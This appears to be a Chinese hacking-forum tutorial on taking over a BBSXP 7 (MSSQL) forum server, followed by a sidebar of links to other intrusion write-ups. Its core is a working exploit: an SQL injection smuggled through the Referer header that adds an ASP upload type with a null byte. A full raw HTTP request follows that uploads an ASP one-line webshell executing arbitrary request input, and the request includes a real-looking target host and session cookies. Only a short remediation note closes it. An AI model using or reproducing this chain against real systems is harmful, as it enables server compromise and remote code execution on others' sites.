|
[推荐]从注入到拿WEBSHELL(BBSXP7 mssql版)
然后就是我慢慢思考怎么得到WEBSHELL的时候了。
经过一系列的探测,我发现了,数据库和网站不在同一个服务器。
所以先前的打算备份日志或者差异备份的想法就给打消了。
就开始了艰辛的只通过BBSXP自带的功能得到WEBSHELL的路。
首先是拿到后台。最新版的BBSXP,MSSQL数据库版本的后台也就多几个注入点。没有用的。我晕。
实在想不到办法。
于是我就照现在你所想的,添加上传类型来试试能不能上传一个WEBSHELL上去。
首先我们必须要先否认几个类型:
asp,asa,cer,cdx.这4个类型在代码里面已经明文禁止了,不能上传。所以否决
我根本试都不去试,呵呵。
于是我就添加ASPX类型上去,上传成功,不过服务器不支持。
于是我又添加PHP类型上去,上传成功,不过服务器不支持。
……………………
很多类型。服务器都不支持。
然后你们这个时候可能要说,可以上传SHTML的类型上去哈,服务器肯定支持。
不过好象SHTML上传上去,我也只能去浏览文件的代码。(据说SHTML有时是可以执行CMD命令的,不过当时我是没抱希望,所以就没去试)所以我也就没去实验这个东西。
难道就没有办法了吗?
我想了大概半个小时。最后还真的给我想到了一个办法。
FSO写文件名的时候,如果遇到空字节,那么,这个空字节后面的字符就会被忽略。
比如我们用FSO写一个文件名是:admin%00(空字节).jpg。那么我们实际上写上去的文件名就是admin没有后缀的。
而数据库又刚好是可以存储空字节的数据库。
OK。。。
下面我们构造如下的语句。
| 以下是代码片段: Referer: http://bbs.yuzi.net/bank.asp','a','post','cheng');update [BBSXP_SiteSettings] set UpFileTypes=UpFileTypes+'|asp'+char(0)+'a' where 1=1-- |
| 以下是代码片段: POST /PostUpFile.asp? HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://bbs.yuzi.net/PostUpFile.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d6215880482 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon) Host: bbs.yuzi.net Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache Cookie: bbsxp=bbsxp; skins=xp; ASPSESSIONIDCSBQADBA=HFMDPPMBNDENBBKCAFJLMBMC; UserID=123536; Userpass=7A268B980E0D89FD1C4F498341B32201; Onlinetime=2006%2D11%2D4+23%3A30%3A23; ForumNameList=%3Coption%20value%3D%27ShowForum.asp%3FForumID%3D2%27%3E%u8BBA%u575B%u4EA4%u6D41%u533A%3C/option%3E%3Coption%20value%3D%27ShowForum.asp%3FForumID%3D1%27%3E%u704C%u6C34%u4E50%u56ED%3C/option%3E; Eremite=0; PostTime=2006%2D11%2D5+0%3A42%3A33 -----------------------------7d6215880482 Content-Disposition: form-data; name="file"; filename="E:\muma.asp a" Content-Type: text/html <%If Request("#")<>"" Then Execute(Request("#"))%> -----------------------------7d6215880482-- |
这就和动易当年的上传漏洞差不多了。
注意muma.asp a中间的空格要用16进制编辑器改成00就是空字节的意思。
然后发送封包。
就会提示你上传123123123123.asp成功。
找到你上传的文件。
接下来的事就不用我说了吧,哈哈。
我要说明一个问题。
有BBSXP有注入点拿下WEBSHELL的方法不只这一个。
我只是选择了一个我认为最简单的方法。所以各位看官找到更有效果的方法,欢迎你来和我交流
但是不要来批判我,谢谢。
最后说说这个漏洞的修补方法,就是过滤HTTP头文件。不要直接放进数据库。
如果实在修补不了的,请暂时停止其银行功能。
这样就可以有一定效果的防御这个漏洞,等待BBSXP官方出补丁。
后记:最近总是有朋友问我,DVBBS后台怎么拿SHELL。。
看了这个文章后,你有新的想法了吗?
| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
您现在的位置: